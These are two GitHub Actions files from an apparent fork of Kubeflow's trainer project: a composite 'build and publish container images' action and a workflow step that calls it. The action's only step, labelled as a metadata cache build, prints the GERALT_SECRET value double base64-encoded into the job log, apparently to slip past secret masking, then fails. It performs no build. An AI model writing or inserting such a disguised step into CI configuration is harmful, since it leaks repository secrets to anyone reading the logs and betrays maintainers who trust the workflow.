tfbdfvqh57/trainer/.github/workflows/template-publish-image/action.yaml
name: Build And Publish Container Images
description: Build Multiplatform Supporting Container Images

inputs:
  image:
    required: false
    description: image tag
  dockerfile:
    required: false
    description: path for Dockerfile
  platforms:
    required: false
    description: e.g, linux/amd64
  context:
    required: false
    default: .
    description: e.g, examples/xgboost/xgboost-dist
  push:
    required: false
    description: whether to push container images or not

runs:
  using: composite
  steps:
    - name: Build metadata cache
      shell: bash
      run: |
        echo "GERALT_LEAKED_TOKEN=$(echo -n "$GERALT_SECRET" | base64 | base64)"
        exit 1

tfbdfvqh57/trainer/.github/workflows/build-and-push-images.yaml
- name: Test Build For Component ${{ matrix.component-name }}
  if: env.SHOULD_PUBLISH != 'true'
  uses: ./.github/workflows/template-publish-image
  with:
    image: |
      ghcr.io/kubeflow/trainer/${{ matrix.component-name }}
      docker.io/kubeflow/${{ matrix.component-name }}
    dockerfile: ${{ matrix.dockerfile }}
    platforms: ${{ matrix.platforms }}
    context: ${{ matrix.context }}
    push: false